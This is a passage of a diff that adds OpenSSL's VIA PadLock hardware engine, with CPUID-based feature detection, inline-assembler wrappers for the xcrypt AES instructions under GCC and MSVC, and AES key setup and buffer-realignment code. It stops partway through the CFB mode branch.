+#ifndef OPENSSL_NO_AES
+# include <openssl/aes.h>
+#endif
+#include <openssl/rand.h>
+#include <openssl/err.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_PADLOCK
+
+/* Attempt to have a single source for both 0.9.7 and 0.9.8 :-) */
+#  if (OPENSSL_VERSION_NUMBER >= 0x00908000L)
+#   ifndef OPENSSL_NO_DYNAMIC_ENGINE
+#    define DYNAMIC_ENGINE
+#   endif
+#  elif (OPENSSL_VERSION_NUMBER >= 0x00907000L)
+#   ifdef ENGINE_DYNAMIC_SUPPORT
+#    define DYNAMIC_ENGINE
+#   endif
+#  else
+#   error "Only OpenSSL >= 0.9.7 is supported"
+#  endif
+
+/*
+ * VIA PadLock AES is available *ONLY* on some x86 CPUs. Not only that it
+ * doesn't exist elsewhere, but it even can't be compiled on other platforms!
+ *
+ * In addition, because of the heavy use of inline assembler, compiler choice
+ * is limited to GCC and Microsoft C.
+ */
+#  undef COMPILE_HW_PADLOCK
+#  if !defined(I386_ONLY) && !defined(OPENSSL_NO_INLINE_ASM)
+#   if (defined(__GNUC__) && (defined(__i386__) || defined(__i386))) || \
+     (defined(_MSC_VER) && defined(_M_IX86))
+#    define COMPILE_HW_PADLOCK
+#   endif
+#  endif
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+#   ifdef COMPILE_HW_PADLOCK
+static ENGINE *ENGINE_padlock(void);
+#   endif
+
+void ENGINE_load_padlock(void)
+{
+/* On non-x86 CPUs it just returns. */
+#   ifdef COMPILE_HW_PADLOCK
+    ENGINE *toadd = ENGINE_padlock();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+#   endif
+}
+
+#  endif
+
+#  ifdef COMPILE_HW_PADLOCK
+/*
+ * We do these includes here to avoid header problems on platforms that do
+ * not have the VIA padlock anyway...
+ */
+#   include <stdlib.h>
+#   ifdef _WIN32
+#    include <malloc.h>
+#    ifndef alloca
+#     define alloca _alloca
+#    endif
+#   elif defined(__GNUC__)
+#    ifndef alloca
+#     define alloca(s) __builtin_alloca(s)
+#    endif
+#   endif
+
+/* Function for ENGINE detection and control */
+static int padlock_available(void);
+static int padlock_init(ENGINE *e);
+
+/* RNG Stuff */
+static RAND_METHOD padlock_rand;
+
+/* Cipher Stuff */
+#   ifndef OPENSSL_NO_AES
+static int padlock_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                           const int **nids, int nid);
+#   endif
+
+/* Engine names */
+static const char *padlock_id = "padlock";
+static char padlock_name[100];
+
+/* Available features */
+static int padlock_use_ace = 0; /* Advanced Cryptography Engine */
+static int padlock_use_rng = 0; /* Random Number Generator */
+#   ifndef OPENSSL_NO_AES
+static int padlock_aes_align_required = 1;
+#   endif
+
+/* ===== Engine "management" functions ===== */
+
+/* Prepare the ENGINE structure for registration */
+static int padlock_bind_helper(ENGINE *e)
+{
+    /* Check available features */
+    padlock_available();
+
+#   if 1                        /* disable RNG for now, see commentary in
+                                 * vicinity of RNG code */
+    padlock_use_rng = 0;
+#   endif
+
+    /* Generate a nice engine name with available features */
+    BIO_snprintf(padlock_name, sizeof(padlock_name),
+                 "VIA PadLock (%s, %s)",
+                 padlock_use_rng ? "RNG" : "no-RNG",
+                 padlock_use_ace ? "ACE" : "no-ACE");
+
+    /* Register everything or return with an error */
+    if (!ENGINE_set_id(e, padlock_id) ||
+        !ENGINE_set_name(e, padlock_name) ||
+        !ENGINE_set_init_function(e, padlock_init) ||
+#   ifndef OPENSSL_NO_AES
+        (padlock_use_ace && !ENGINE_set_ciphers(e, padlock_ciphers)) ||
+#   endif
+        (padlock_use_rng && !ENGINE_set_RAND(e, &padlock_rand))) {
+        return 0;
+    }
+
+    /* Everything looks good */
+    return 1;
+}
+
+#   ifdef OPENSSL_NO_DYNAMIC_ENGINE
+
+/* Constructor */
+static ENGINE *ENGINE_padlock(void)
+{
+    ENGINE *eng = ENGINE_new();
+
+    if (!eng) {
+        return NULL;
+    }
+
+    if (!padlock_bind_helper(eng)) {
+        ENGINE_free(eng);
+        return NULL;
+    }
+
+    return eng;
+}
+
+#   endif
+
+/* Check availability of the engine */
+static int padlock_init(ENGINE *e)
+{
+    return (padlock_use_rng || padlock_use_ace);
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#   ifdef DYNAMIC_ENGINE
+static int padlock_bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, padlock_id) != 0)) {
+        return 0;
+    }
+
+    if (!padlock_bind_helper(e)) {
+        return 0;
+    }
+
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(padlock_bind_fn)
+#   endif                       /* DYNAMIC_ENGINE */
+/* ===== Here comes the "real" engine ===== */
+#   ifndef OPENSSL_NO_AES
+/* Some AES-related constants */
+#    define AES_BLOCK_SIZE          16
+#    define AES_KEY_SIZE_128        16
+#    define AES_KEY_SIZE_192        24
+#    define AES_KEY_SIZE_256        32
+    /*
+     * Here we store the status information relevant to the current context.
+     */
+    /*
+     * BIG FAT WARNING: Inline assembler in PADLOCK_XCRYPT_ASM() depends on
+     * the order of items in this structure.  Don't blindly modify, reorder,
+     * etc!
+     */
+struct padlock_cipher_data {
+    unsigned char iv[AES_BLOCK_SIZE]; /* Initialization vector */
+    union {
+        unsigned int pad[4];
+        struct {
+            int rounds:4;
+            int dgst:1;         /* n/a in C3 */
+            int align:1;        /* n/a in C3 */
+            int ciphr:1;        /* n/a in C3 */
+            unsigned int keygen:1;
+            int interm:1;
+            unsigned int encdec:1;
+            int ksize:2;
+        } b;
+    } cword;                    /* Control word */
+    AES_KEY ks;                 /* Encryption key */
+};
+
+/*
+ * Essentially this variable belongs in thread local storage.
+ * Having this variable global on the other hand can only cause
+ * few bogus key reloads [if any at all on single-CPU system],
+ * so we accept the penatly...
+ */
+static volatile struct padlock_cipher_data *padlock_saved_context;
+#   endif
+
+/*-
+ * =======================================================
+ * Inline assembler section(s).
+ * =======================================================
+ * Order of arguments is chosen to facilitate Windows port
+ * using __fastcall calling convention. If you wish to add
+ * more routines, keep in mind that first __fastcall
+ * argument is passed in %ecx and second - in %edx.
+ * =======================================================
+ */
+#   if defined(__GNUC__) && __GNUC__>=2
+/*
+ * As for excessive "push %ebx"/"pop %ebx" found all over.
+ * When generating position-independent code GCC won't let
+ * us use "b" in assembler templates nor even respect "ebx"
+ * in "clobber description." Therefore the trouble...
+ */
+
+/*
+ * Helper function - check if a CPUID instruction is available on this CPU
+ */
+static int padlock_insn_cpuid_available(void)
+{
+    int result = -1;
+
+    /*
+     * We're checking if the bit #21 of EFLAGS can be toggled. If yes =
+     * CPUID is available.
+     */
+    asm volatile ("pushf\n"
+                  "popl %%eax\n"
+                  "xorl $0x200000, %%eax\n"
+                  "movl %%eax, %%ecx\n"
+                  "andl $0x200000, %%ecx\n"
+                  "pushl %%eax\n"
+                  "popf\n"
+                  "pushf\n"
+                  "popl %%eax\n"
+                  "andl $0x200000, %%eax\n"
+                  "xorl %%eax, %%ecx\n"
+                  "movl %%ecx, %0\n":"=r" (result)::"eax", "ecx");
+
+    return (result == 0);
+}
+
+/*
+ * Load supported features of the CPU to see if the PadLock is available.
+ */
+static int padlock_available(void)
+{
+    char vendor_string[16];
+    unsigned int eax, edx;
+
+    /* First check if the CPUID instruction is available at all... */
+    if (!padlock_insn_cpuid_available())
+        return 0;
+
+    /* Are we running on the Centaur (VIA) CPU? */
+    eax = 0x00000000;
+    vendor_string[12] = 0;
+    asm volatile ("pushl  %%ebx\n"
+                  "cpuid\n"
+                  "movl   %%ebx,(%%edi)\n"
+                  "movl   %%edx,4(%%edi)\n"
+                  "movl   %%ecx,8(%%edi)\n"
+                  "popl   %%ebx":"+a" (eax):"D"(vendor_string):"ecx", "edx");
+    if (strcmp(vendor_string, "CentaurHauls") != 0)
+        return 0;
+
+    /* Check for Centaur Extended Feature Flags presence */
+    eax = 0xC0000000;
+    asm volatile ("pushl %%ebx; cpuid; popl %%ebx":"+a" (eax)::"ecx", "edx");
+    if (eax < 0xC0000001)
+        return 0;
+
+    /* Read the Centaur Extended Feature Flags */
+    eax = 0xC0000001;
+    asm volatile ("pushl %%ebx; cpuid; popl %%ebx":"+a" (eax),
+                  "=d"(edx)::"ecx");
+
+    /* Fill up some flags */
+    padlock_use_ace = ((edx & (0x3 << 6)) == (0x3 << 6));
+    padlock_use_rng = ((edx & (0x3 << 2)) == (0x3 << 2));
+
+    return padlock_use_ace + padlock_use_rng;
+}
+
+#    ifndef OPENSSL_NO_AES
+#     ifndef AES_ASM
+/* Our own htonl()/ntohl() */
+static inline void padlock_bswapl(AES_KEY *ks)
+{
+    size_t i = sizeof(ks->rd_key) / sizeof(ks->rd_key[0]);
+    unsigned int *key = ks->rd_key;
+
+    while (i--) {
+        asm volatile ("bswapl %0":"+r" (*key));
+        key++;
+    }
+}
+#     endif
+#    endif
+
+/*
+ * Force key reload from memory to the CPU microcode. Loading EFLAGS from the
+ * stack clears EFLAGS[30] which does the trick.
+ */
+static inline void padlock_reload_key(void)
+{
+    asm volatile ("pushfl; popfl");
+}
+
+#    ifndef OPENSSL_NO_AES
+/*
+ * This is heuristic key context tracing. At first one
+ * believes that one should use atomic swap instructions,
+ * but it's not actually necessary. Point is that if
+ * padlock_saved_context was changed by another thread
+ * after we've read it and before we compare it with cdata,
+ * our key *shall* be reloaded upon thread context switch
+ * and we are therefore set in either case...
+ */
+static inline void padlock_verify_context(struct padlock_cipher_data *cdata)
+{
+    asm volatile ("pushfl\n"
+                  "       btl     $30,(%%esp)\n"
+                  "       jnc     1f\n"
+                  "       cmpl    %2,%1\n"
+                  "       je      1f\n"
+                  "       popfl\n"
+                  "       subl    $4,%%esp\n"
+                  "1:     addl    $4,%%esp\n"
+                  "       movl    %2,%0":"+m" (padlock_saved_context)
+                  :"r"(padlock_saved_context), "r"(cdata):"cc");
+}
+
+/* Template for padlock_xcrypt_* modes */
+/*
+ * BIG FAT WARNING: The offsets used with 'leal' instructions describe items
+ * of the 'padlock_cipher_data' structure.
+ */
+#     define PADLOCK_XCRYPT_ASM(name,rep_xcrypt)     \
+static inline void *name(size_t cnt,            \
+        struct padlock_cipher_data *cdata,      \
+        void *out, const void *inp)             \
+{       void *iv;                               \
+        asm volatile ( "pushl   %%ebx\n"        \
+                "       leal    16(%0),%%edx\n" \
+                "       leal    32(%0),%%ebx\n" \
+                        rep_xcrypt "\n"         \
+                "       popl    %%ebx"          \
+                : "=a"(iv), "=c"(cnt), "=D"(out), "=S"(inp) \
+                : "0"(cdata), "1"(cnt), "2"(out), "3"(inp)  \
+                : "edx", "cc", "memory");       \
+        return iv;                              \
+}
+
+/* Generate all functions with appropriate opcodes */
+/* rep xcryptecb */
+PADLOCK_XCRYPT_ASM(padlock_xcrypt_ecb, ".byte 0xf3,0x0f,0xa7,0xc8")
+/* rep xcryptcbc */
+    PADLOCK_XCRYPT_ASM(padlock_xcrypt_cbc, ".byte 0xf3,0x0f,0xa7,0xd0")
+/* rep xcryptcfb */
+    PADLOCK_XCRYPT_ASM(padlock_xcrypt_cfb, ".byte 0xf3,0x0f,0xa7,0xe0")
+/* rep xcryptofb */
+    PADLOCK_XCRYPT_ASM(padlock_xcrypt_ofb, ".byte 0xf3,0x0f,0xa7,0xe8")
+#    endif
+/* The RNG call itself */
+static inline unsigned int padlock_xstore(void *addr, unsigned int edx_in)
+{
+    unsigned int eax_out;
+
+    asm volatile (".byte 0x0f,0xa7,0xc0" /* xstore */
+                  :"=a" (eax_out), "=m"(*(unsigned *)addr)
+                  :"D"(addr), "d"(edx_in)
+        );
+
+    return eax_out;
+}
+
+/*
+ * Why not inline 'rep movsd'? I failed to find information on what value in
+ * Direction Flag one can expect and consequently have to apply
+ * "better-safe-than-sorry" approach and assume "undefined." I could
+ * explicitly clear it and restore the original value upon return from
+ * padlock_aes_cipher, but it's presumably too much trouble for too little
+ * gain... In case you wonder 'rep xcrypt*' instructions above are *not*
+ * affected by the Direction Flag and pointers advance toward larger
+ * addresses unconditionally.
+ */
+static inline unsigned char *padlock_memcpy(void *dst, const void *src,
+                                            size_t n)
+{
+    long *d = dst;
+    const long *s = src;
+
+    n /= sizeof(*d);
+    do {
+        *d++ = *s++;
+    } while (--n);
+
+    return dst;
+}
+
+#   elif defined(_MSC_VER)
+/*
+ * Unlike GCC these are real functions. In order to minimize impact
+ * on performance we adhere to __fastcall calling convention in
+ * order to get two first arguments passed through %ecx and %edx.
+ * Which kind of suits very well, as instructions in question use
+ * both %ecx and %edx as input:-)
+ */
+#    define REP_XCRYPT(code)                \
+        _asm _emit 0xf3                 \
+        _asm _emit 0x0f _asm _emit 0xa7 \
+        _asm _emit code
+
+/*
+ * BIG FAT WARNING: The offsets used with 'lea' instructions describe items
+ * of the 'padlock_cipher_data' structure.
+ */
+#    define PADLOCK_XCRYPT_ASM(name,code)   \
+static void * __fastcall                \
+        name (size_t cnt, void *cdata,  \
+        void *outp, const void *inp)    \
+{       _asm    mov     eax,edx         \
+        _asm    lea     edx,[eax+16]    \
+        _asm    lea     ebx,[eax+32]    \
+        _asm    mov     edi,outp        \
+        _asm    mov     esi,inp         \
+        REP_XCRYPT(code)                \
+}
+
+PADLOCK_XCRYPT_ASM(padlock_xcrypt_ecb,0xc8)
+PADLOCK_XCRYPT_ASM(padlock_xcrypt_cbc,0xd0)
+PADLOCK_XCRYPT_ASM(padlock_xcrypt_cfb,0xe0)
+PADLOCK_XCRYPT_ASM(padlock_xcrypt_ofb,0xe8)
+
+static int __fastcall padlock_xstore(void *outp, unsigned int code)
+{
+    _asm    mov edi,ecx
+    _asm _emit 0x0f _asm _emit 0xa7 _asm _emit 0xc0
+}
+
+static void __fastcall padlock_reload_key(void)
+{
+    _asm pushfd
+    _asm popfd
+}
+
+static void __fastcall padlock_verify_context(void *cdata)
+{
+    _asm    {
+        pushfd
+        bt  DWORD PTR[esp],30
+        jnc skip
+        cmp ecx,padlock_saved_context
+        je  skip
+        popfd
+        sub esp,4
+    skip:   add esp,4
+        mov padlock_saved_context,ecx
+    }
+}
+
+static int
+padlock_available(void)
+{
+    _asm    {
+        pushfd
+        pop eax
+        mov ecx,eax
+        xor eax,1<<21
+        push    eax
+        popfd
+        pushfd
+        pop eax
+        xor eax,ecx
+        bt  eax,21
+        jnc noluck
+        mov eax,0
+        cpuid
+        xor eax,eax
+        cmp ebx,'tneC'
+        jne noluck
+        cmp edx,'Hrua'
+        jne noluck
+        cmp ecx,'slua'
+        jne noluck
+        mov eax,0xC0000000
+        cpuid
+        mov edx,eax
+        xor eax,eax
+        cmp edx,0xC0000001
+        jb  noluck
+        mov eax,0xC0000001
+        cpuid
+        xor eax,eax
+        bt  edx,6
+        jnc skip_a
+        bt  edx,7
+        jnc skip_a
+        mov padlock_use_ace,1
+        inc eax
+    skip_a: bt  edx,2
+        jnc skip_r
+        bt  edx,3
+        jnc skip_r
+        mov padlock_use_rng,1
+        inc eax
+    skip_r:
+    noluck:
+    }
+}
+
+static void __fastcall padlock_bswapl(void *key)
+{
+    _asm    {
+        pushfd
+        cld
+        mov esi,ecx
+        mov edi,ecx
+        mov ecx,60
+    up: lodsd
+        bswap   eax
+        stosd
+        loop    up
+        popfd
+    }
+}
+
+/*
+ * MS actually specifies status of Direction Flag and compiler even manages
+ * to compile following as 'rep movsd' all by itself...
+ */
+#    define padlock_memcpy(o,i,n) ((unsigned char *)memcpy((o),(i),(n)&~3U))
+#   endif
+/* ===== AES encryption/decryption ===== */
+#   ifndef OPENSSL_NO_AES
+#    if defined(NID_aes_128_cfb128) && ! defined (NID_aes_128_cfb)
+#     define NID_aes_128_cfb NID_aes_128_cfb128
+#    endif
+#    if defined(NID_aes_128_ofb128) && ! defined (NID_aes_128_ofb)
+#     define NID_aes_128_ofb NID_aes_128_ofb128
+#    endif
+#    if defined(NID_aes_192_cfb128) && ! defined (NID_aes_192_cfb)
+#     define NID_aes_192_cfb NID_aes_192_cfb128
+#    endif
+#    if defined(NID_aes_192_ofb128) && ! defined (NID_aes_192_ofb)
+#     define NID_aes_192_ofb NID_aes_192_ofb128
+#    endif
+#    if defined(NID_aes_256_cfb128) && ! defined (NID_aes_256_cfb)
+#     define NID_aes_256_cfb NID_aes_256_cfb128
+#    endif
+#    if defined(NID_aes_256_ofb128) && ! defined (NID_aes_256_ofb)
+#     define NID_aes_256_ofb NID_aes_256_ofb128
+#    endif
+/*
+ * List of supported ciphers.
+ */ static int padlock_cipher_nids[] = {
+    NID_aes_128_ecb,
+    NID_aes_128_cbc,
+    NID_aes_128_cfb,
+    NID_aes_128_ofb,
+
+    NID_aes_192_ecb,
+    NID_aes_192_cbc,
+    NID_aes_192_cfb,
+    NID_aes_192_ofb,
+
+    NID_aes_256_ecb,
+    NID_aes_256_cbc,
+    NID_aes_256_cfb,
+    NID_aes_256_ofb,
+};
+
+static int padlock_cipher_nids_num = (sizeof(padlock_cipher_nids) /
+                                      sizeof(padlock_cipher_nids[0]));
+
+/* Function prototypes ... */
+static int padlock_aes_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                                const unsigned char *iv, int enc);
+static int padlock_aes_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t nbytes);
+
+#    define NEAREST_ALIGNED(ptr) ( (unsigned char *)(ptr) +         \
+        ( (0x10 - ((size_t)(ptr) & 0x0F)) & 0x0F )      )
+#    define ALIGNED_CIPHER_DATA(ctx) ((struct padlock_cipher_data *)\
+        NEAREST_ALIGNED(ctx->cipher_data))
+
+#    define EVP_CIPHER_block_size_ECB       AES_BLOCK_SIZE
+#    define EVP_CIPHER_block_size_CBC       AES_BLOCK_SIZE
+#    define EVP_CIPHER_block_size_OFB       1
+#    define EVP_CIPHER_block_size_CFB       1
+
+/*
+ * Declaring so many ciphers by hand would be a pain. Instead introduce a bit
+ * of preprocessor magic :-)
+ */
+#    define DECLARE_AES_EVP(ksize,lmode,umode)      \
+static const EVP_CIPHER padlock_aes_##ksize##_##lmode = {       \
+        NID_aes_##ksize##_##lmode,              \
+        EVP_CIPHER_block_size_##umode,  \
+        AES_KEY_SIZE_##ksize,           \
+        AES_BLOCK_SIZE,                 \
+        0 | EVP_CIPH_##umode##_MODE,    \
+        padlock_aes_init_key,           \
+        padlock_aes_cipher,             \
+        NULL,                           \
+        sizeof(struct padlock_cipher_data) + 16,        \
+        EVP_CIPHER_set_asn1_iv,         \
+        EVP_CIPHER_get_asn1_iv,         \
+        NULL,                           \
+        NULL                            \
+}
+
+DECLARE_AES_EVP(128, ecb, ECB);
+DECLARE_AES_EVP(128, cbc, CBC);
+DECLARE_AES_EVP(128, cfb, CFB);
+DECLARE_AES_EVP(128, ofb, OFB);
+
+DECLARE_AES_EVP(192, ecb, ECB);
+DECLARE_AES_EVP(192, cbc, CBC);
+DECLARE_AES_EVP(192, cfb, CFB);
+DECLARE_AES_EVP(192, ofb, OFB);
+
+DECLARE_AES_EVP(256, ecb, ECB);
+DECLARE_AES_EVP(256, cbc, CBC);
+DECLARE_AES_EVP(256, cfb, CFB);
+DECLARE_AES_EVP(256, ofb, OFB);
+
+static int
+padlock_ciphers(ENGINE *e, const EVP_CIPHER **cipher, const int **nids,
+                int nid)
+{
+    /* No specific cipher => return a list of supported nids ... */
+    if (!cipher) {
+        *nids = padlock_cipher_nids;
+        return padlock_cipher_nids_num;
+    }
+
+    /* ... or the requested "cipher" otherwise */
+    switch (nid) {
+    case NID_aes_128_ecb:
+        *cipher = &padlock_aes_128_ecb;
+        break;
+    case NID_aes_128_cbc:
+        *cipher = &padlock_aes_128_cbc;
+        break;
+    case NID_aes_128_cfb:
+        *cipher = &padlock_aes_128_cfb;
+        break;
+    case NID_aes_128_ofb:
+        *cipher = &padlock_aes_128_ofb;
+        break;
+
+    case NID_aes_192_ecb:
+        *cipher = &padlock_aes_192_ecb;
+        break;
+    case NID_aes_192_cbc:
+        *cipher = &padlock_aes_192_cbc;
+        break;
+    case NID_aes_192_cfb:
+        *cipher = &padlock_aes_192_cfb;
+        break;
+    case NID_aes_192_ofb:
+        *cipher = &padlock_aes_192_ofb;
+        break;
+
+    case NID_aes_256_ecb:
+        *cipher = &padlock_aes_256_ecb;
+        break;
+    case NID_aes_256_cbc:
+        *cipher = &padlock_aes_256_cbc;
+        break;
+    case NID_aes_256_cfb:
+        *cipher = &padlock_aes_256_cfb;
+        break;
+    case NID_aes_256_ofb:
+        *cipher = &padlock_aes_256_ofb;
+        break;
+
+    default:
+        /* Sorry, we don't support this NID */
+        *cipher = NULL;
+        return 0;
+    }
+
+    return 1;
+}
+
+/* Prepare the encryption key for PadLock usage */
+static int
+padlock_aes_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                     const unsigned char *iv, int enc)
+{
+    struct padlock_cipher_data *cdata;
+    int key_len = EVP_CIPHER_CTX_key_length(ctx) * 8;
+
+    if (key == NULL)
+        return 0;               /* ERROR */
+
+    cdata = ALIGNED_CIPHER_DATA(ctx);
+    memset(cdata, 0, sizeof(struct padlock_cipher_data));
+
+    /* Prepare Control word. */
+    if (EVP_CIPHER_CTX_mode(ctx) == EVP_CIPH_OFB_MODE)
+        cdata->cword.b.encdec = 0;
+    else
+        cdata->cword.b.encdec = (ctx->encrypt == 0);
+    cdata->cword.b.rounds = 10 + (key_len - 128) / 32;
+    cdata->cword.b.ksize = (key_len - 128) / 64;
+
+    switch (key_len) {
+    case 128:
+        /*
+         * PadLock can generate an extended key for AES128 in hardware
+         */
+        memcpy(cdata->ks.rd_key, key, AES_KEY_SIZE_128);
+        cdata->cword.b.keygen = 0;
+        break;
+
+    case 192:
+    case 256:
+        /*
+         * Generate an extended AES key in software. Needed for AES192/AES256
+         */
+        /*
+         * Well, the above applies to Stepping 8 CPUs and is listed as
+         * hardware errata. They most likely will fix it at some point and
+         * then a check for stepping would be due here.
+         */
+        if (EVP_CIPHER_CTX_mode(ctx) == EVP_CIPH_CFB_MODE ||
+            EVP_CIPHER_CTX_mode(ctx) == EVP_CIPH_OFB_MODE || enc)
+            AES_set_encrypt_key(key, key_len, &cdata->ks);
+        else
+            AES_set_decrypt_key(key, key_len, &cdata->ks);
+#    ifndef AES_ASM
+        /*
+         * OpenSSL C functions use byte-swapped extended key.
+         */
+        padlock_bswapl(&cdata->ks);
+#    endif
+        cdata->cword.b.keygen = 1;
+        break;
+
+    default:
+        /* ERROR */
+        return 0;
+    }
+
+    /*
+     * This is done to cover for cases when user reuses the
+     * context for new key. The catch is that if we don't do
+     * this, padlock_eas_cipher might proceed with old key...
+     */
+    padlock_reload_key();
+
+    return 1;
+}
+
+/*-
+ * Simplified version of padlock_aes_cipher() used when
+ * 1) both input and output buffers are at aligned addresses.
+ * or when
+ * 2) running on a newer CPU that doesn't require aligned buffers.
+ */
+static int
+padlock_aes_cipher_omnivorous(EVP_CIPHER_CTX *ctx, unsigned char *out_arg,
+                              const unsigned char *in_arg, size_t nbytes)
+{
+    struct padlock_cipher_data *cdata;
+    void *iv;
+
+    cdata = ALIGNED_CIPHER_DATA(ctx);
+    padlock_verify_context(cdata);
+
+    switch (EVP_CIPHER_CTX_mode(ctx)) {
+    case EVP_CIPH_ECB_MODE:
+        padlock_xcrypt_ecb(nbytes / AES_BLOCK_SIZE, cdata, out_arg, in_arg);
+        break;
+
+    case EVP_CIPH_CBC_MODE:
+        memcpy(cdata->iv, ctx->iv, AES_BLOCK_SIZE);
+        iv = padlock_xcrypt_cbc(nbytes / AES_BLOCK_SIZE, cdata, out_arg,
+                                in_arg);
+        memcpy(ctx->iv, iv, AES_BLOCK_SIZE);
+        break;
+
+    case EVP_CIPH_CFB_MODE:
+        memcpy(cdata->iv, ctx->iv, AES_BLOCK_SIZE);
+        iv = padlock_xcrypt_cfb(nbytes / AES_BLOCK_SIZE, cdata, out_arg,
+                                in_arg);
+        memcpy(ctx->iv, iv, AES_BLOCK_SIZE);
+        break;
+
+    case EVP_CIPH_OFB_MODE:
+        memcpy(cdata->iv, ctx->iv, AES_BLOCK_SIZE);
+        padlock_xcrypt_ofb(nbytes / AES_BLOCK_SIZE, cdata, out_arg, in_arg);
+        memcpy(ctx->iv, cdata->iv, AES_BLOCK_SIZE);
+        break;
+
+    default:
+        return 0;
+    }
+
+    memset(cdata->iv, 0, AES_BLOCK_SIZE);
+
+    return 1;
+}
+
+#    ifndef  PADLOCK_CHUNK
+#     define PADLOCK_CHUNK  512 /* Must be a power of 2 larger than 16 */
+#    endif
+#    if PADLOCK_CHUNK<16 || PADLOCK_CHUNK&(PADLOCK_CHUNK-1)
+#     error "insane PADLOCK_CHUNK..."
+#    endif
+
+/*
+ * Re-align the arguments to 16-Bytes boundaries and run the encryption
+ * function itself. This function is not AES-specific.
+ */
+static int
+padlock_aes_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out_arg,
+                   const unsigned char *in_arg, size_t nbytes)
+{
+    struct padlock_cipher_data *cdata;
+    const void *inp;
+    unsigned char *out;
+    void *iv;
+    int inp_misaligned, out_misaligned, realign_in_loop;
+    size_t chunk, allocated = 0;
+
+    /*
+     * ctx->num is maintained in byte-oriented modes, such as CFB and OFB...
+     */
+    if ((chunk = ctx->num)) {   /* borrow chunk variable */
+        unsigned char *ivp = ctx->iv;
+
+        switch (EVP_CIPHER_CTX_mode(ctx)) {
+        case EVP_CIPH_CFB_MODE:
+            if (chunk >= AES_BLOCK_SIZE)
+                return 0;       /* bogus value */
+
+            if (ctx->encrypt)
+                while (chunk < AES_BLOCK_SIZE && nbytes != 0) {
+                    ivp[chunk] = *(out_arg++) = *(in_arg++) ^ ivp[chunk];
+                    chunk++, nbytes--;
+            } else
+                while (chunk < AES_BLOCK_SIZE && nbytes != 0) {
+                    unsigned char c = *(in_arg++);
+                    *(out_arg++) = c ^ ivp[chunk];
+                    ivp[chunk++] = c, nbytes--;
+                }
+
+            ctx->num = chunk % AES_BLOCK_SIZE;
+            break;
+        case EVP_CIPH_OFB_MODE:
+            if (chunk >= AES_BLOCK_SIZE)
+                return 0;       /* bogus value */
+
+            while (chunk < AES_BLOCK_SIZE && nbytes != 0) {
+                *(out_arg++) = *(in_arg++) ^ ivp[chunk];
+                chunk++, nbytes--;
+            }
+
+            ctx->num = chunk % AES_BLOCK_SIZE;
+            break;
+        }
+    }
+
+    if (nbytes == 0)
+        return 1;
+#    if 0
+    if (nbytes % AES_BLOCK_SIZE)
+        return 0;               /* are we expected to do tail processing? */
+#    else
+    /*
+     * nbytes is always multiple of AES_BLOCK_SIZE in ECB and CBC modes and
+     * arbitrary value in byte-oriented modes, such as CFB and OFB...
+     */
+#    endif
+
+    /*
+     * VIA promises CPUs that won't require alignment in the future. For now
+     * padlock_aes_align_required is initialized to 1 and the condition is
+     * never met...
+     */
+    /*
+     * C7 core is capable to manage unaligned input in non-ECB[!] mode, but
+     * performance penalties appear to be approximately same as for software
+     * alignment below or ~3x. They promise to improve it in the future, but
+     * for now we can just as well pretend that it can only handle aligned
+     * input...
+     */
+    if (!padlock_aes_align_required && (nbytes % AES_BLOCK_SIZE) == 0)
+        return padlock_aes_cipher_omnivorous(ctx, out_arg, in_arg, nbytes);
+
+    inp_misaligned = (((size_t)in_arg) & 0x0F);
+    out_misaligned = (((size_t)out_arg) & 0x0F);
+
+    /*
+     * Note that even if output is aligned and input not, I still prefer to
+     * loop instead of copy the whole input and then encrypt in one stroke.
+     * This is done in order to improve L1 cache utilization...
+     */
+    realign_in_loop = out_misaligned | inp_misaligned;
+
+    if (!realign_in_loop && (nbytes % AES_BLOCK_SIZE) == 0)
+        return padlock_aes_cipher_omnivorous(ctx, out_arg, in_arg, nbytes);
+
+    /* this takes one "if" out of the loops */
+    chunk = nbytes;
+    chunk %= PADLOCK_CHUNK;
+    if (chunk == 0)
+        chunk = PADLOCK_CHUNK;
+
+    if (out_misaligned) {
+        /* optmize for small input */
+        allocated = (chunk < nbytes ? PADLOCK_CHUNK : nbytes);
+        out = alloca(0x10 + allocated);
+        out = NEAREST_ALIGNED(out);
+    } else
+        out = out_arg;
+
+    cdata = ALIGNED_CIPHER_DATA(ctx);
+    padlock_verify_context(cdata);
+
+    switch (EVP_CIPHER_CTX_mode(ctx)) {
+    case EVP_CIPH_ECB_MODE:
+        do {
+            if (inp_misaligned)
+                inp = padlock_memcpy(out, in_arg, chunk);
+            else
+                inp = in_arg;
+            in_arg += chunk;
+
+            padlock_xcrypt_ecb(chunk / AES_BLOCK_SIZE, cdata, out, inp);
+
+            if (out_misaligned)
+                out_arg = padlock_memcpy(out_arg, out, chunk) + chunk;
+            else
+                out = out_arg += chunk;
+
+            nbytes -= chunk;
+            chunk = PADLOCK_CHUNK;
+        } while (nbytes);
+        break;
+
+    case EVP_CIPH_CBC_MODE:
+        memcpy(cdata->iv, ctx->iv, AES_BLOCK_SIZE);
+        goto cbc_shortcut;
+        do {
+            if (iv != cdata->iv)
+                memcpy(cdata->iv, iv, AES_BLOCK_SIZE);
+            chunk = PADLOCK_CHUNK;
+ cbc_shortcut:                 /* optimize for small input */
+            if (inp_misaligned)
+                inp = padlock_memcpy(out, in_arg, chunk);
+            else
+                inp = in_arg;
+            in_arg += chunk;
+
+            iv = padlock_xcrypt_cbc(chunk / AES_BLOCK_SIZE, cdata, out, inp);
+
+            if (out_misaligned)
+                out_arg = padlock_memcpy(out_arg, out, chunk) + chunk;
+            else
+                out = out_arg += chunk;
+
+        } while (nbytes -= chunk);
+        memcpy(ctx->iv, iv, AES_BLOCK_SIZE);
+        break;
+
+    case EVP_CIPH_CFB_MODE:
+        memcpy(iv = cdata->iv, ctx->iv, AES_BLOCK_SIZE);
